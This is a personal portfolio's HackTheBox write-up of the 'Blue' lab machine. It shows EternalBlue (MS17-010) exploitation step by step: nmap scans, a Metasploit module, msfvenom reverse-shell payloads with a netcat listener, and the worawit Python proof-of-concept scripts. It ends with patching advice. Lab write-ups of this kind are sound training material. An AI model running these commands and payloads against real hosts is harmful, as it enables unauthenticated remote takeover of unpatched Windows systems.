N E T H R A N. W E D A G E

Loading

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.

Contact Info

Hire Me
Hire Me
Home / Portfolio / HackTheBox / HTB: Blue
cat ~/htb/htb-blue.md
HackTheBox

HTB: Blue

02 Apr 2024 Windows 20 pts Easy

EternalBlue (MS17-010) exploitation on a Windows target. Manual exploit without Metasploit — using Impacket and custom Python scripts.

Windows EternalBlue MS17-010 Easy
Writeup

HTB: Blue — Full Writeup

Blue is one of the most iconic machines on HackTheBox. It runs an unpatched Windows 7 system vulnerable to EternalBlue — the NSA-developed exploit leaked by the Shadow Brokers in 2017 that later powered WannaCry and NotPetya. It gives unauthenticated remote code execution directly as NT AUTHORITY\SYSTEM — no privilege escalation needed.

Machine Info

  • OS: Windows 7 SP1 x64
  • Difficulty: Easy
  • IP: 10.10.10.40
  • Key Vulnerability: SMBv1 — CVE-2017-0144 (MS17-010 EternalBlue)

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and service versions:

nmap -sV -sC -p- --min-rate 5000 10.10.10.40

Key results from the scan:

  • Port 135 — Microsoft RPC
  • Port 139 — NetBIOS / SMB
  • Port 445 — Microsoft-DS (SMBv1, Windows 7 SP1)
  • Port 49152–49157 — Various RPC endpoints

The standout finding is port 445 running SMBv1 on Windows 7 SP1 — a textbook EternalBlue candidate. SMBv1 is a legacy protocol that should never be enabled on modern systems.

Step 2 — SMB Vulnerability Check

Confirm the target is vulnerable to MS17-010 using Nmap's built-in SMB vuln scripts:

nmap --script smb-vuln-ms17-010 -p 445 10.10.10.40

The output confirms the host is vulnerable:

| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144
|     Risk factor: HIGH

The vulnerability exists in the way SMBv1 handles certain transaction requests. A specially crafted packet triggers a buffer overflow, allowing arbitrary code execution as SYSTEM without any authentication.

Step 3 — Exploitation (Metasploit)

Load the EternalBlue module in Metasploit:

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST 10.10.14.X   # your tun0 IP
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Metasploit connects back with a Meterpreter session. Verify privileges:

getuid
Server username: NT AUTHORITY\SYSTEM

sysinfo
Computer: BLUE
OS: Windows 7 (Build 7601, Service Pack 1)

Direct SYSTEM — no privilege escalation needed.

Step 4 — Exploitation (Manual, no Metasploit)

For OSCP preparation, use the Python PoC from worawit's MS17-010 repository on GitHub. First check which named pipes are available on the target: 

git clone https://github.com/worawit/MS17-010
cd MS17-010

# Identify usable named pipes
python checker.py 10.10.10.40

Generate a reverse shell payload with msfvenom, then set up a Netcat listener:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.X LPORT=4444 -f exe -o shell.exe
nc -lvnp 4444

Run the exploit, passing the generated payload:

python send_and_execute.py 10.10.10.40 shell.exe

The listener receives a shell as SYSTEM:

Microsoft Windows [Version 6.1.7601]
C:\Windows\system32> whoami
nt authority\system

Note: the worawit PoC requires Python 2 and the impacket library. Ensure your environment is configured correctly before attempting. If send_and_execute.py fails, try zzz_exploit.py with a named pipe identified by checker.py.

Step 5 — Flags

With a SYSTEM shell, grab both flags:

# User flag
type C:\Users\haris\Desktop\user.txt

# Root flag
type C:\Users\Administrator\Desktop\root.txt

Bonus — Alternative Script (zzz_exploit.py)

If send_and_execute.py does not work, worawit's zzz_exploit.py is an alternative that targets a specific named pipe. Edit the script to add your shellcode and specify the pipe name found by checker.py: 

# Inside zzz_exploit.py, set the named pipe (e.g. samr, browser, netlogon)
# then run:
python zzz_exploit.py 10.10.10.40 samr

This approach gives more control over which pipe is targeted and can be more reliable on certain configurations.

Key Takeaways

  • SMBv1 should be disabled on all systems — it has no place in modern environments
  • CVE-2017-0144 requires no authentication and gives direct SYSTEM access
  • Nmap's smb-vuln-ms17-010 script is a fast and reliable way to confirm the vulnerability
  • Manual exploitation with the worawit PoC is essential practice for OSCP — Metasploit won't be available
  • The same exploit was used in the WannaCry ransomware attack in May 2017 — patch MS17-010 immediately
  • distccd-style alternate paths don't apply here; EternalBlue is the only reliable vector on this box

Tools Used

  • nmap — port scanning, service enumeration, and vuln script (smb-vuln-ms17-010)
  • Metasploitexploit/windows/smb/ms17_010_eternalblue
  • msfvenom — reverse shell payload generation
  • worawit/MS17-010 — manual Python PoC (checker.py, send_and_execute.py, zzz_exploit.py)
  • netcat — reverse shell listener
  • impacket — required dependency for the manual PoC
Project Info
Category HackTheBox
Difficulty Easy
OS / Target Windows
Points 20 pts
Date 02 Apr 2024
Tools Used
Nmap Impacket Python
Actions
Back to HackTheBox Get In Touch
More HackTheBox
HackTheBox
HTB: Lame

Classic Easy Linux box. Exploited a vulnerable Samba service to gain direct root access. Full walkthrough covering enumeration, exploitation and post-exploitation.

Mar 2024 Details
HackTheBox
HTB: Beep

Elastix / FreePBX server with multiple attack vectors. Exploited Local File Inclusion to grab credentials, then escalated to root via sudo misconfiguration.

May 2024 Details
HackTheBox
HTB: Lise

Elastix / FreePBX server with multiple attack vectors. Exploited Local File Inclusion to grab credentials, then escalated to root via sudo misconfiguration.

May 2024 Details